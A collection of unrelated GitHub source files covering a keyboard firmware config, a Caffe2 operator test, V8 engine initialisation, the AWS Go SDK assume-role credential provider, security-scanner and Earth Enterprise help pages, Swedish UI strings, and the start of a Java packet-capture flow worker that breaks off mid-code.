{ "pile_set_name": "Github" }
/* Copyright 2020 Nick Brassel (tzarc) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ #pragma once // #define CH_CFG_OPTIMIZE_SPEED TRUE #include_next "chconf.h"
{ "pile_set_name": "Github" }
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

from caffe2.python import core
import caffe2.python.hypothesis_test_util as hu
import caffe2.python.serialized_test.serialized_test_util as serial
from hypothesis import given
import hypothesis.strategies as st
import numpy as np

import unittest


class TestMean(serial.SerializedTestCase):
    @serial.given(
        k=st.integers(1, 5),
        n=st.integers(1, 10),
        m=st.integers(1, 10),
        in_place=st.booleans(),
        seed=st.integers(0, 2**32 - 1),
        **hu.gcs
    )
    def test_mean(self, k, n, m, in_place, seed, gc, dc):
        """Validate the Mean operator against a numpy reference.

        Feeds k random (n, m) float32 blobs through "Mean" and checks the
        forward result, the gradient, and cross-device consistency.
        """
        np.random.seed(seed)

        # k input blobs named X0..X{k-1}, each an n-by-m float32 matrix.
        # (Names and values are generated in the same order as before, so
        # the RNG draw sequence is unchanged for a given seed.)
        blob_names = ['X' + str(idx) for idx in range(k)]
        blob_values = [
            np.random.randn(n, m).astype(np.float32) for _ in range(k)
        ]

        def reference_mean(*inputs):
            # Element-wise mean across all k input blobs.
            return [np.mean(inputs, axis=0)]

        # In-place mode writes the result back into the first input blob.
        output_name = 'X0' if in_place else 'Y'
        op = core.CreateOperator("Mean", blob_names, [output_name])

        self.assertReferenceChecks(
            device_option=gc,
            op=op,
            inputs=blob_values,
            reference=reference_mean,
        )
        self.assertGradientChecks(
            device_option=gc,
            op=op,
            inputs=blob_values,
            outputs_to_check=0,
            outputs_with_grads=[0],
        )
        self.assertDeviceChecks(dc, op, blob_values, [0])


if __name__ == "__main__":
    unittest.main()
{ "pile_set_name": "Github" }
// Copyright 2012 the V8 project authors. All rights reserved. // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials provided // with the distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived // from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
#include "v8.h"

#include "assembler.h"
#include "isolate.h"
#include "elements.h"
#include "bootstrapper.h"
#include "debug.h"
#include "deoptimizer.h"
#include "frames.h"
#include "heap-profiler.h"
#include "hydrogen.h"
#include "lithium-allocator.h"
#include "log.h"
#include "once.h"
#include "platform.h"
#include "runtime-profiler.h"
#include "serialize.h"
#include "store-buffer.h"

namespace v8 {
namespace internal {

// Guard so process-wide initialization runs exactly once (see
// InitializeOncePerProcess below).
V8_DECLARE_ONCE(init_once);

// Process-wide engine state flags.
bool V8::is_running_ = false;
bool V8::has_been_set_up_ = false;
bool V8::has_been_disposed_ = false;
bool V8::has_fatal_error_ = false;
bool V8::use_crankshaft_ = true;
List<CallCompletedCallback>* V8::call_completed_callbacks_ = NULL;

// Protects calls into the (externally supplied) entropy_source, which is not
// assumed to be thread-safe.
static LazyMutex entropy_mutex = LAZY_MUTEX_INITIALIZER;

static EntropySource entropy_source;


// Initializes the engine for the current thread: runs once-per-process setup,
// enters the default isolate if the thread has not entered one yet, and then
// initializes that isolate (optionally from a snapshot deserializer).
// Returns false if a fatal error was previously recorded (IsDead()).
bool V8::Initialize(Deserializer* des) {
  FlagList::EnforceFlagImplications();

  InitializeOncePerProcess();

  // The current thread may not yet have entered an isolate to run.
  // Note the Isolate::Current() may be non-null because for various
  // initialization purposes an initializing thread may be assigned an isolate
  // but not actually enter it.
  if (i::Isolate::CurrentPerIsolateThreadData() == NULL) {
    i::Isolate::EnterDefaultIsolate();
  }

  ASSERT(i::Isolate::CurrentPerIsolateThreadData() != NULL);
  ASSERT(i::Isolate::CurrentPerIsolateThreadData()->thread_id().Equals(
           i::ThreadId::Current()));
  ASSERT(i::Isolate::CurrentPerIsolateThreadData()->isolate() ==
         i::Isolate::Current());

  if (IsDead()) return false;

  Isolate* isolate = Isolate::Current();
  if (isolate->IsInitialized()) return true;

  is_running_ = true;
  has_been_set_up_ = true;
  has_fatal_error_ = false;
  has_been_disposed_ = false;

  return isolate->Init(des);
}


// Marks the VM as dead after an unrecoverable error; IsDead() will be true
// from here on and Initialize() will refuse to proceed.
void V8::SetFatalError() {
  is_running_ = false;
  has_fatal_error_ = true;
}


// Tears down the default isolate and all process-wide caches. Safe to call
// when setup never happened or teardown already ran (returns early).
// NOTE(review): must be called from the thread holding the default isolate —
// the ASSERT below checks this.
void V8::TearDown() {
  Isolate* isolate = Isolate::Current();
  ASSERT(isolate->IsDefaultIsolate());

  if (!has_been_set_up_ || has_been_disposed_) return;

  ElementsAccessor::TearDown();
  LOperand::TearDownCaches();
  RegisteredExtension::UnregisterAll();

  isolate->TearDown();
  delete isolate;

  is_running_ = false;
  has_been_disposed_ = true;

  delete call_completed_callbacks_;
  call_completed_callbacks_ = NULL;

  OS::TearDown();
}


// Fills the two 32-bit MWC state words, preferring (in order) the
// --random-seed flag, a user-installed entropy source, and system random().
static void seed_random(uint32_t* state) {
  for (int i = 0; i < 2; ++i) {
    if (FLAG_random_seed != 0) {
      state[i] = FLAG_random_seed;
    } else if (entropy_source != NULL) {
      uint32_t val;
      ScopedLock lock(entropy_mutex.Pointer());
      entropy_source(reinterpret_cast<unsigned char*>(&val), sizeof(uint32_t));
      state[i] = val;
    } else {
      state[i] = random();
    }
  }
}


// Random number generator using George Marsaglia's MWC algorithm.
static uint32_t random_base(uint32_t* state) {
  // Initialize seed using the system random().
  // No non-zero seed will ever become zero again.
  if (state[0] == 0) seed_random(state);

  // Mix the bits.  Never replaces state[i] with 0 if it is nonzero.
  state[0] = 18273 * (state[0] & 0xFFFF) + (state[0] >> 16);
  state[1] = 36969 * (state[1] & 0xFFFF) + (state[1] >> 16);

  // Combine the two streams into one 32-bit value.
  return (state[0] << 14) + (state[1] & 0x3FFFF);
}


void V8::SetEntropySource(EntropySource source) {
  entropy_source = source;
}


void V8::SetReturnAddressLocationResolver(
    ReturnAddressLocationResolver resolver) {
  StackFrame::SetReturnAddressLocationResolver(resolver);
}


// Used by JavaScript APIs.  Draws from the per-context seed stored in the
// global context's random_seed byte array.
uint32_t V8::Random(Context* context) {
  ASSERT(context->IsGlobalContext());
  ByteArray* seed = context->random_seed();
  return random_base(reinterpret_cast<uint32_t*>(seed->GetDataStartAddress()));
}


// Used internally by the JIT and memory allocator for security
// purposes. So, we keep a different state to prevent information
// leaks that could be used in an exploit.
uint32_t V8::RandomPrivate(Isolate* isolate) {
  ASSERT(isolate == Isolate::Current());
  return random_base(isolate->private_random_seed());
}


bool V8::IdleNotification(int hint) {
  // Returning true tells the caller that there is no need to call
  // IdleNotification again.
  if (!FLAG_use_idle_notification) return true;

  // Tell the heap that it may want to adjust.
  return HEAP->IdleNotification(hint);
}


// Registers a callback to run after each API call completes; duplicates are
// silently ignored.
void V8::AddCallCompletedCallback(CallCompletedCallback callback) {
  if (call_completed_callbacks_ == NULL) {  // Lazy init.
    call_completed_callbacks_ = new List<CallCompletedCallback>();
  }
  for (int i = 0; i < call_completed_callbacks_->length(); i++) {
    if (callback == call_completed_callbacks_->at(i)) return;
  }
  call_completed_callbacks_->Add(callback);
}


void V8::RemoveCallCompletedCallback(CallCompletedCallback callback) {
  if (call_completed_callbacks_ == NULL) return;
  for (int i = 0; i < call_completed_callbacks_->length(); i++) {
    if (callback == call_completed_callbacks_->at(i)) {
      call_completed_callbacks_->Remove(i);
    }
  }
}


// Invokes all registered call-completed callbacks, but only once the
// outermost API call returns (call depth zero).
void V8::FireCallCompletedCallback(Isolate* isolate) {
  if (call_completed_callbacks_ == NULL) return;
  HandleScopeImplementer* handle_scope_implementer =
      isolate->handle_scope_implementer();
  if (!handle_scope_implementer->CallDepthIsZero()) return;
  // Fire callbacks.  Increase call depth to prevent recursive callbacks.
  handle_scope_implementer->IncrementCallDepth();
  for (int i = 0; i < call_completed_callbacks_->length(); i++) {
    call_completed_callbacks_->at(i)();
  }
  handle_scope_implementer->DecrementCallDepth();
}


// Use a union type to avoid type-aliasing optimizations in GCC.
typedef union {
  double double_value;
  uint64_t uint64_t_value;
} double_int_union;


// Stores a random double in [0, 1) into an existing HeapNumber, built by
// bit-twiddling the mantissa rather than a floating-point divide.
Object* V8::FillHeapNumberWithRandom(Object* heap_number,
                                     Context* context) {
  double_int_union r;
  uint64_t random_bits = Random(context);
  // Convert 32 random bits to 0.(32 random bits) in a double
  // by computing:
  // (1.(20 0s)(32 random bits) x 2^20) - (1.0 x 2^20).
  static const double binary_million = 1048576.0;
  r.double_value = binary_million;
  r.uint64_t_value |= random_bits;
  r.double_value -= binary_million;

  HeapNumber::cast(heap_number)->set_value(r.double_value);
  return heap_number;
}


// Body of the V8_DECLARE_ONCE-guarded process setup: OS, CPU feature
// detection, profiler, caches, and flag-driven stress options.
void V8::InitializeOncePerProcessImpl() {
  OS::SetUp();

  use_crankshaft_ = FLAG_crankshaft;

  if (Serializer::enabled()) {
    use_crankshaft_ = false;
  }

  CPU::SetUp();
  if (!CPU::SupportsCrankshaft()) {
    use_crankshaft_ = false;
  }

  OS::PostSetUp();
  RuntimeProfiler::GlobalSetUp();

  ElementsAccessor::InitializeOncePerProcess();

  if (FLAG_stress_compaction) {
    FLAG_force_marking_deque_overflows = true;
    FLAG_gc_global = true;
    FLAG_max_new_space_size = (1 << (kPageSizeBits - 10)) * 2;
  }

  LOperand::SetUpCaches();
  SetUpJSCallerSavedCodeData();
  SamplerRegistry::SetUp();
  ExternalReference::SetUp();
}

void V8::InitializeOncePerProcess() {
  CallOnce(&init_once, &InitializeOncePerProcessImpl);
}

} }  // namespace v8::internal
{ "pile_set_name": "Github" }
/* Package stscreds are credential Providers to retrieve STS AWS credentials. STS provides multiple ways to retrieve credentials which can be used when making future AWS service API operation calls. The SDK will ensure that per instance of credentials.Credentials all requests to refresh the credentials will be synchronized. But, the SDK is unable to ensure synchronous usage of the AssumeRoleProvider if the value is shared between multiple Credentials, Sessions or service clients. Assume Role To assume an IAM role using STS with the SDK you can create a new Credentials with the SDKs's stscreds package. // Initial credentials loaded from SDK's default credential chain. Such as // the environment, shared credentials (~/.aws/credentials), or EC2 Instance // Role. These credentials will be used to to make the STS Assume Role API. sess := session.Must(session.NewSession()) // Create the credentials from AssumeRoleProvider to assume the role // referenced by the "myRoleARN" ARN. creds := stscreds.NewCredentials(sess, "myRoleArn") // Create service client value configured for credentials // from assumed role. svc := s3.New(sess, &aws.Config{Credentials: creds}) Assume Role with static MFA Token To assume an IAM role with a MFA token you can either specify a MFA token code directly or provide a function to prompt the user each time the credentials need to refresh the role's credentials. Specifying the TokenCode should be used for short lived operations that will not need to be refreshed, and when you do not want to have direct control over the user provides their MFA token. With TokenCode the AssumeRoleProvider will be not be able to refresh the role's credentials. // Create the credentials from AssumeRoleProvider to assume the role // referenced by the "myRoleARN" ARN using the MFA token code provided. 
creds := stscreds.NewCredentials(sess, "myRoleArn", func(p *stscreds.AssumeRoleProvider) { p.SerialNumber = aws.String("myTokenSerialNumber") p.TokenCode = aws.String("00000000") }) // Create service client value configured for credentials // from assumed role. svc := s3.New(sess, &aws.Config{Credentials: creds}) Assume Role with MFA Token Provider To assume an IAM role with MFA for longer running tasks where the credentials may need to be refreshed setting the TokenProvider field of AssumeRoleProvider will allow the credential provider to prompt for new MFA token code when the role's credentials need to be refreshed. The StdinTokenProvider function is available to prompt on stdin to retrieve the MFA token code from the user. You can also implement custom prompts by satisfing the TokenProvider function signature. Using StdinTokenProvider with multiple AssumeRoleProviders, or Credentials will have undesirable results as the StdinTokenProvider will not be synchronized. A single Credentials with an AssumeRoleProvider can be shared safely. // Create the credentials from AssumeRoleProvider to assume the role // referenced by the "myRoleARN" ARN. Prompting for MFA token from stdin. creds := stscreds.NewCredentials(sess, "myRoleArn", func(p *stscreds.AssumeRoleProvider) { p.SerialNumber = aws.String("myTokenSerialNumber") p.TokenProvider = stscreds.StdinTokenProvider }) // Create service client value configured for credentials // from assumed role. svc := s3.New(sess, &aws.Config{Credentials: creds}) */ package stscreds import ( "fmt" "os" "time" "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/awserr" "github.com/aws/aws-sdk-go/aws/client" "github.com/aws/aws-sdk-go/aws/credentials" "github.com/aws/aws-sdk-go/internal/sdkrand" "github.com/aws/aws-sdk-go/service/sts" ) // StdinTokenProvider will prompt on stderr and read from stdin for a string value. // An error is returned if reading from stdin fails. // // Use this function go read MFA tokens from stdin. 
The function makes no attempt // to make atomic prompts from stdin across multiple gorouties. // // Using StdinTokenProvider with multiple AssumeRoleProviders, or Credentials will // have undesirable results as the StdinTokenProvider will not be synchronized. A // single Credentials with an AssumeRoleProvider can be shared safely // // Will wait forever until something is provided on the stdin. func StdinTokenProvider() (string, error) { var v string fmt.Fprintf(os.Stderr, "Assume Role MFA token code: ") _, err := fmt.Scanln(&v) return v, err } // ProviderName provides a name of AssumeRole provider const ProviderName = "AssumeRoleProvider" // AssumeRoler represents the minimal subset of the STS client API used by this provider. type AssumeRoler interface { AssumeRole(input *sts.AssumeRoleInput) (*sts.AssumeRoleOutput, error) } // DefaultDuration is the default amount of time in minutes that the credentials // will be valid for. var DefaultDuration = time.Duration(15) * time.Minute // AssumeRoleProvider retrieves temporary credentials from the STS service, and // keeps track of their expiration time. // // This credential provider will be used by the SDKs default credential change // when shared configuration is enabled, and the shared config or shared credentials // file configure assume role. See Session docs for how to do this. // // AssumeRoleProvider does not provide any synchronization and it is not safe // to share this value across multiple Credentials, Sessions, or service clients // without also sharing the same Credentials instance. type AssumeRoleProvider struct { credentials.Expiry // STS client to make assume role request with. Client AssumeRoler // Role to be assumed. RoleARN string // Session name, if you wish to reuse the credentials elsewhere. RoleSessionName string // Expiry duration of the STS credentials. Defaults to 15 minutes if not set. Duration time.Duration // Optional ExternalID to pass along, defaults to nil if not set. 
ExternalID *string // The policy plain text must be 2048 bytes or shorter. However, an internal // conversion compresses it into a packed binary format with a separate limit. // The PackedPolicySize response element indicates by percentage how close to // the upper size limit the policy is, with 100% equaling the maximum allowed // size. Policy *string // The identification number of the MFA device that is associated with the user // who is making the AssumeRole call. Specify this value if the trust policy // of the role being assumed includes a condition that requires MFA authentication. // The value is either the serial number for a hardware device (such as GAHT12345678) // or an Amazon Resource Name (ARN) for a virtual device (such as arn:aws:iam::123456789012:mfa/user). SerialNumber *string // The value provided by the MFA device, if the trust policy of the role being // assumed requires MFA (that is, if the policy includes a condition that tests // for MFA). If the role being assumed requires MFA and if the TokenCode value // is missing or expired, the AssumeRole call returns an "access denied" error. // // If SerialNumber is set and neither TokenCode nor TokenProvider are also // set an error will be returned. TokenCode *string // Async method of providing MFA token code for assuming an IAM role with MFA. // The value returned by the function will be used as the TokenCode in the Retrieve // call. See StdinTokenProvider for a provider that prompts and reads from stdin. // // This token provider will be called when ever the assumed role's // credentials need to be refreshed when SerialNumber is also set and // TokenCode is not set. // // If both TokenCode and TokenProvider is set, TokenProvider will be used and // TokenCode is ignored. TokenProvider func() (string, error) // ExpiryWindow will allow the credentials to trigger refreshing prior to // the credentials actually expiring. 
This is beneficial so race conditions // with expiring credentials do not cause request to fail unexpectedly // due to ExpiredTokenException exceptions. // // So a ExpiryWindow of 10s would cause calls to IsExpired() to return true // 10 seconds before the credentials are actually expired. // // If ExpiryWindow is 0 or less it will be ignored. ExpiryWindow time.Duration // MaxJitterFrac reduces the effective Duration of each credential requested // by a random percentage between 0 and MaxJitterFraction. MaxJitterFrac must // have a value between 0 and 1. Any other value may lead to expected behavior. // With a MaxJitterFrac value of 0, default) will no jitter will be used. // // For example, with a Duration of 30m and a MaxJitterFrac of 0.1, the // AssumeRole call will be made with an arbitrary Duration between 27m and // 30m. // // MaxJitterFrac should not be negative. MaxJitterFrac float64 } // NewCredentials returns a pointer to a new Credentials object wrapping the // AssumeRoleProvider. The credentials will expire every 15 minutes and the // role will be named after a nanosecond timestamp of this operation. // // Takes a Config provider to create the STS client. The ConfigProvider is // satisfied by the session.Session type. // // It is safe to share the returned Credentials with multiple Sessions and // service clients. All access to the credentials and refreshing them // will be synchronized. func NewCredentials(c client.ConfigProvider, roleARN string, options ...func(*AssumeRoleProvider)) *credentials.Credentials { p := &AssumeRoleProvider{ Client: sts.New(c), RoleARN: roleARN, Duration: DefaultDuration, } for _, option := range options { option(p) } return credentials.NewCredentials(p) } // NewCredentialsWithClient returns a pointer to a new Credentials object wrapping the // AssumeRoleProvider. The credentials will expire every 15 minutes and the // role will be named after a nanosecond timestamp of this operation. 
//
// Takes an AssumeRoler which can be satisfied by the STS client.
//
// It is safe to share the returned Credentials with multiple Sessions and
// service clients. All access to the credentials and refreshing them
// will be synchronized.
func NewCredentialsWithClient(svc AssumeRoler, roleARN string, options ...func(*AssumeRoleProvider)) *credentials.Credentials {
	p := &AssumeRoleProvider{
		Client:   svc,
		RoleARN:  roleARN,
		Duration: DefaultDuration,
	}

	// Apply caller-supplied customizations before wrapping the provider.
	for _, option := range options {
		option(p)
	}

	return credentials.NewCredentials(p)
}

// Retrieve generates a new set of temporary credentials using STS.
func (p *AssumeRoleProvider) Retrieve() (credentials.Value, error) {
	// Apply defaults where parameters are not set.
	if p.RoleSessionName == "" {
		// Try to work out a role name that will hopefully end up unique.
		p.RoleSessionName = fmt.Sprintf("%d", time.Now().UTC().UnixNano())
	}
	if p.Duration == 0 {
		// Expire as often as AWS permits.
		p.Duration = DefaultDuration
	}
	// Randomly shorten the requested Duration by up to MaxJitterFrac so that
	// refreshes from many clients do not all line up at the same instant.
	jitter := time.Duration(sdkrand.SeededRand.Float64() * p.MaxJitterFrac * float64(p.Duration))
	input := &sts.AssumeRoleInput{
		DurationSeconds: aws.Int64(int64((p.Duration - jitter) / time.Second)),
		RoleArn:         aws.String(p.RoleARN),
		RoleSessionName: aws.String(p.RoleSessionName),
		ExternalId:      p.ExternalID,
	}
	if p.Policy != nil {
		input.Policy = p.Policy
	}
	if p.SerialNumber != nil {
		// MFA is required: a token must come from TokenCode or TokenProvider.
		if p.TokenCode != nil {
			input.SerialNumber = p.SerialNumber
			input.TokenCode = p.TokenCode
		} else if p.TokenProvider != nil {
			input.SerialNumber = p.SerialNumber
			code, err := p.TokenProvider()
			if err != nil {
				return credentials.Value{ProviderName: ProviderName}, err
			}
			input.TokenCode = aws.String(code)
		} else {
			return credentials.Value{ProviderName: ProviderName},
				awserr.New("AssumeRoleTokenNotAvailable",
					"assume role with MFA enabled, but neither TokenCode nor TokenProvider are set", nil)
		}
	}

	roleOutput, err := p.Client.AssumeRole(input)
	if err != nil {
		return credentials.Value{ProviderName: ProviderName}, err
	}

	// We will proactively generate new credentials before they expire.
	p.SetExpiration(*roleOutput.Credentials.Expiration, p.ExpiryWindow)

	return credentials.Value{
		AccessKeyID:     *roleOutput.Credentials.AccessKeyId,
		SecretAccessKey: *roleOutput.Credentials.SecretAccessKey,
		SessionToken:    *roleOutput.Credentials.SessionToken,
		ProviderName:    ProviderName,
	}, nil
}
{ "pile_set_name": "Github" }
<a href="<%- url %>" class="AknColumn-navigationLink<% if (active) { %> AknColumn-navigationLink--active<% } %> navigation-item"><%- title %></a>
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<title>Spider tab</title>
</head>
<body>
<h1>Spider tab</h1>
<p>
The Spider tab shows you the set of unique URIs found by the
<a href="../../start/features/spider.html">Spider</a> during the scans.
</p>
<p>
The 'New Scan' button launches the <a href="../dialogs/spider.html">Spider dialog</a>
which allows you to specify exactly what should be scanned.<br>
The Spider can be run on multiple Sites in parallel and the results for each scan are
shown by selecting the scan via the 'Progress' pull-down.
</p>
<p>The toolbar shows information about a scan and allows you to control it.
It provides a set of buttons which allow you to:
<ul>
<li><img align="bottom" alt="pause button" src="../../images/16/141.png"> Pause (and <img alt="resume button" src="../../images/16/131.png"> resume) the selected spider scan;</li>
<li><img align="bottom" alt="stop button" src="../../images/16/142.png"> Stop the selected spider scan;</li>
<li><img align="bottom" alt="clean scans button" src="../../images/fugue/broom.png"> Clean completed scans;</li>
<li><img align="bottom" alt="spider options button" src="../../images/16/041.png"> Open the <a href="../../ui/dialogs/options/spider.html">Spider Options screen</a>.</li>
</ul>
The progress bar shows how far the selected spider scan has progressed.
The number of active spider scans and the number of URIs found for the selected scan
are also shown.
<p>For each URI found you can see:
<ul>
<li>Processed - Whether the URI was processed by the Spider or was skipped from fetching because of a rule (e.g. it was out of scope)</li>
<li>Method - The HTTP method, e.g. GET or POST, through which the resource should be accessed</li>
<li>URI - the resource found</li>
<li>Flags - any information about the URI (e.g.
if it's a seed or why was it not processed)</li> </ul> <p>For each spider message, shown under the Messages tab, you can see details of the request sent and response received. The <code>Processed</code> column, indicates whether: <ul> <li><img align="bottom" alt="successful parse" src="../../images/16/152.png">Successfully - the response was successfully received and parsed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Empty Message - the response was not parsed because it was empty</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">I/O Error - an input/output error occurred while fetching the response</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Max Children - the response was not parsed because the corresponding parent Sites node already has more child nodes than the maximum allowed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Max Depth - the response was not parsed because it passed the maximum depth allowed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Max Size - the response was not parsed because its size is not under the maximum allowed</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Not Text - the response was not parsed because it's not text, for example, an image</li> <li><img align="bottom" alt="no parse" src="../../images/16/149.png">Spider Stopped - the response was not fetched or parsed because the spider was already stopped</li> </ul> <h2>See also</h2> <table> <tr> <td>&nbsp;&nbsp;&nbsp;&nbsp;</td> <td><a href="../overview.html">UI Overview</a></td> <td>for an overview of the user interface</td> </tr> <tr> <td>&nbsp;&nbsp;&nbsp;&nbsp;</td> <td><a href="../../start/features/spider.html">Spider</a></td> <td>for an overview of the Spider</td> </tr> <tr> <td>&nbsp;&nbsp;&nbsp;&nbsp;</td> <td><a href="../../ui/dialogs/options/spider.html">Spider Options screen</a></td> <td>for an overview of the 
Spider Options</td> </tr> </table> </body> </html>
{ "pile_set_name": "Github" }
<!doctype html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Installing GEE Server &#8212; Google Earth Enterprise 5.3.3 documentation</title> <link rel="stylesheet" href="../../static/bizstyle.css" type="text/css" /> <link rel="stylesheet" href="../../static/pygments.css" type="text/css" /> <script type="text/javascript" id="documentation_options" data-url_root="../../" src="../../static/documentation_options.js"></script> <script type="text/javascript" src="../../static/jquery.js"></script> <script type="text/javascript" src="../../static/underscore.js"></script> <script type="text/javascript" src="../../static/doctools.js"></script> <script type="text/javascript" src="../../static/bizstyle.js"></script> <link rel="index" title="Index" href="../../genindex.html" /> <link rel="search" title="Search" href="../../search.html" /> <link rel="next" title="Uninstalling GEE Server" href="uninstallGEEServer.html" /> <link rel="prev" title="Before you install GEE Server" href="beforeYouInstallGEEServer.html" /> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <!--[if lt IE 9]> <script type="text/javascript" src="static/css3-mediaqueries.js"></script> <![endif]--> </head><body> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="uninstallGEEServer.html" title="Uninstalling GEE Server" accesskey="N">next</a> |</li> <li class="right" > <a href="beforeYouInstallGEEServer.html" title="Before you install GEE Server" accesskey="P">previous</a> |</li> <li class="nav-item nav-item-0"><a href="../../index.html">Google Earth Enterprise 5.3.3 documentation</a> &#187;</li> <li class="nav-item nav-item-1"><a 
href="../installGEE.html" accesskey="U">Install Google Earth Enterprise</a> &#187;</li> </ul> </div> <div class="sphinxsidebar" role="navigation" aria-label="main navigation"> <div class="sphinxsidebarwrapper"> <h4>Previous topic</h4> <p class="topless"><a href="beforeYouInstallGEEServer.html" title="previous chapter">Before you install GEE Server</a></p> <h4>Next topic</h4> <p class="topless"><a href="uninstallGEEServer.html" title="next chapter">Uninstalling GEE Server</a></p> <div id="searchbox" style="display: none" role="search"> <h3>Quick search</h3> <div class="searchformwrapper"> <form class="search" action="../../search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body" role="main"> <p><a class="reference internal" href="../../images/googlelogo_color_260x88dp8.png"><img alt="Google logo" src="../../images/googlelogo_color_260x88dp8.png" style="width: 130px; height: 44px;" /></a></p> <div class="section" id="installing-gee-server"> <h1>Installing GEE Server<a class="headerlink" href="#installing-gee-server" title="Permalink to this headline">¶</a></h1> <div class="docutils container"> <div class="content docutils container"> You can install GEE Server via the command line. 
For instructions, see the GEE wiki at <a class="reference external" href="https://github.com/google/earthenterprise/wiki/Install-Fusion-or-Earth-Server">https://github.com/google/earthenterprise/wiki/Install-Fusion-or-Earth-Server</a>.</div> </div> </div> </div> </div> </div> <div class="clearer"></div> </div> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="uninstallGEEServer.html" title="Uninstalling GEE Server" >next</a> |</li> <li class="right" > <a href="beforeYouInstallGEEServer.html" title="Before you install GEE Server" >previous</a> |</li> <li class="nav-item nav-item-0"><a href="../../index.html">Google Earth Enterprise 5.3.3 documentation</a> &#187;</li> <li class="nav-item nav-item-1"><a href="../installGEE.html" >Install Google Earth Enterprise</a> &#187;</li> </ul> </div> <div class="footer" role="contentinfo"> &#169; Copyright 2019, Open GEE Contributors. Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.7.5. </div> </body> </html>
{ "pile_set_name": "Github" }
/* Class = "UIBarButtonItem"; title = "Add Database"; ObjectID = "CbK-f7-To5"; Note = "Action"; */ "CbK-f7-To5.title" = "Lägg till databas"; /* Class = "UILabel"; text = "No recent databases"; ObjectID = "fXt-kp-oSe"; */ "fXt-kp-oSe.text" = "Inga nyligen använda databaser"; /* Class = "UINavigationItem"; title = "Databases"; ObjectID = "Zun-me-VzS"; */ "Zun-me-VzS.title" = "Databaser";
{ "pile_set_name": "Github" }
package cic.cs.unb.ca.jnetpcap.worker; import cic.cs.unb.ca.jnetpcap.BasicFlow; import cic.cs.unb.ca.jnetpcap.FlowGenerator; import cic.cs.unb.ca.jnetpcap.PacketReader; import org.jnetpcap.Pcap; import org.jnetpcap.nio.JMemory.Type; import org.jnetpcap.packet.PcapPacket; import org.jnetpcap.packet.PcapPacketHandler; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import javax.swing.*; import java.util.List; public class TrafficFlowWorker extends SwingWorker<String,String> implements FlowGenListener{ public static final Logger logger = LoggerFactory.getLogger(TrafficFlowWorker.class); public static final String PROPERTY_FLOW = "flow"; private String device; public TrafficFlowWorker(String device) { super(); this.device = device; } @Override protected String doInBackground() { FlowGenerator flowGen = new FlowGenerator(true,120000000L, 5000000L); flowGen.addFlowListener(this); int snaplen = 64 * 1024;//2048; // Truncate packet at this size int promiscous = Pcap.MODE_PROMISCUOUS; int timeout = 60 * 1000; // In milliseconds StringBuilder errbuf = new StringBuilder(); Pcap pcap = Pcap.openLive(device, snaplen, promiscous, timeout, errbuf); if (pcap == null) { logger.info("open {} fail -> {}",device,errbuf.toString()); return String.format("open %s fail ->",device)+errbuf.toString(); } PcapPacketHandler<String> jpacketHandler = (packet, user) -> { /* * BufferUnderflowException while decoding header * that is because: * 1.PCAP library is not multi-threaded * 2.jNetPcap library is not multi-threaded * 3.Care must be taken how packets or the data they referenced is used in multi-threaded environment * * typical rule: * make new packet objects and perform deep copies of the data in PCAP buffers they point to * * but it seems not work */ PcapPacket 